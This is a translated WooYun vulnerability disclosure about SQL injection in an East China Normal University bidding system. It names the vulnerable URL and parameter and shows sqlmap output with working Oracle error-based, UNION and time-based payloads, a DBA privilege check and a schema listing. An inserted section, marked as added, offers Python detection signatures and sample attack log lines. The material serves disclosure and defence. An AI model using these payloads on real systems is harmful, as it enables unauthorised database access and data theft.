
Vulnerability summary

Defect ID: wooyun-2015-0158640

Title: SQL injection in a system at East China Normal University #DBA privileges #sql-shell obtained

Affected vendor: East China Normal University

Author: 路人甲

Submitted: 2015-12-07 12:40

Fixed: 2016-01-21 14:10

Public disclosure: 2016-01-21 14:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-07: Details sent to the vendor, awaiting vendor handling
2015-12-07: Vendor confirmed; details visible to the vendor only
2015-12-17: Details disclosed to core white hats and relevant domain experts
2015-12-27: Details disclosed to regular white hats
2016-01-06: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public

Brief description:

As the title says.

Detailed description:

I saw that this site already had vulnerabilities reported, but a keyword search turned up nothing, so this one probably has not been submitted before.
0x01 Vulnerability location

East China Normal University equipment bidding system


0x02 Vulnerability details

http://jingjia.ecnu.edu.cn/sggl/wsjj/ggztDetails.jsp?WID=1


0x03 Exploitation method

sqlmap

Proof of vulnerability:

0x04 Proof

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: WID
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: WID=1' AND 1357=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1357=1357) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113)) AND 'VMng'='VMng
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: WID=1' UNION ALL SELECT NULL,CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||CHR(103)||CHR(68)||CHR(81)||CHR(71)||CHR(97)||CHR(73)||CHR(82)||CHR(106)||CHR(103)||CHR(81)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113),NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: WID=1' AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(116)||CHR(114)||CHR(98),5) AND 'FeZB'='FeZB
---
[13:47:01] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
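The three sqlmap techniques listed above (Oracle error-based via UTL_INADDR, UNION with NULL columns FROM DUAL, and time-based via DBMS_PIPE) all leave recognisable traces in web access logs. The following is an added example, not part of the original report, showing how a defender can flag them and how a strict integer allowlist on the WID parameter (assumed to be a numeric id, as the page's WID=1 suggests) would reject every payload before it reaches the database. The log lines are constructed, modelled on the payload shapes in the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Defensive signatures for the Oracle sqlmap techniques the report lists.
# They flag indicators in decoded parameter values; they are not exploit code.
ORACLE_SQLI_SIGNATURES = {
    "error-based (UTL_INADDR)": re.compile(r"UTL_INADDR\s*\.\s*GET_HOST_ADDRESS", re.I),
    "union-based (NULL columns, FROM DUAL)": re.compile(r"UNION\s+ALL\s+SELECT\b.*\bFROM\s+DUAL\b", re.I | re.S),
    "time-based (DBMS_PIPE)": re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE", re.I),
    "CHR() concatenation (quote-filter evasion)": re.compile(r"(?:CHR\(\d+\)\s*\|\|\s*){3,}", re.I),
}

def is_valid_wid(value: str) -> bool:
    """Allowlist check the endpoint should enforce: WID is a positive integer (assumption)."""
    return value.isdigit() and 0 < int(value) < 10**9

def inspect_request(url: str) -> dict:
    """Decode a request URL and return {param: [findings]} for suspicious parameters."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    findings = {}
    for name, values in params.items():
        for value in values:
            hits = [label for label, rx in ORACLE_SQLI_SIGNATURES.items() if rx.search(value)]
            if name == "WID" and not is_valid_wid(value):
                hits.append("WID fails integer allowlist")
            if hits:
                findings[name] = hits
    return findings

# Constructed access-log lines (not a real log), one benign request plus one per technique.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Dec/2015:13:44:57 +0800] "GET /sggl/wsjj/ggztDetails.jsp?WID=1 HTTP/1.1" 200 5120
10.0.0.5 - - [07/Dec/2015:13:44:58 +0800] "GET /sggl/wsjj/ggztDetails.jsp?WID=1%27%20AND%201357%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28109%29%7C%7CCHR%2897%29%7C%7C%28SELECT%201%20FROM%20DUAL%29%29%20AND%20%27VMng%27%3D%27VMng HTTP/1.1" 500 812
10.0.0.5 - - [07/Dec/2015:13:45:01 +0800] "GET /sggl/wsjj/ggztDetails.jsp?WID=1%27%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28109%29%7C%7CCHR%2897%29%7C%7CCHR%28107%29%2CNULL%20FROM%20DUAL-- HTTP/1.1" 200 5203
10.0.0.5 - - [07/Dec/2015:13:45:09 +0800] "GET /sggl/wsjj/ggztDetails.jsp?WID=1%27%20AND%202452%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%2C5%29%20AND%20%27FeZB%27%3D%27FeZB HTTP/1.1" 200 5120
"""

LOG_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_log(text: str) -> list:
    """Return (url, findings) for every log line that has at least one finding."""
    results = []
    for line in text.splitlines():
        m = LOG_LINE.search(line)
        if m and (found := inspect_request(m.group(1))):
            results.append((m.group(1), found))
    return results

if __name__ == "__main__":
    for url, found in scan_log(SAMPLE_LOG):
        print(url[:60], found)
```

The benign WID=1 line produces no finding; each injected line is flagged both by a technique signature and by the allowlist, which is the check that would have prevented the issue regardless of signature coverage.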


The current database user turned out to have DBA privileges

[13:44:57] [INFO] testing if current user is DBA
[13:44:57] [WARNING] reflective value(s) found and filtering out
current user is DBA: True


All databases (schemas)

available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HSD_ZJK
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] ZC
[*] ZC20110430
[*] ZC20140731
[*] ZC_TEST
[*] ZCTEST


Table information

Database: ZC
[320 tables]


Obtaining a sql-shell

[Screenshot of the sqlmap sql-shell session; image not recoverable]

Remediation:

I think it's time to replace the system.

Copyright notice: when reposting, please credit the source: 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2015-12-07 14:07

Vendor reply:

The responsible subordinate unit has been notified to handle it.

Latest status:

None yet

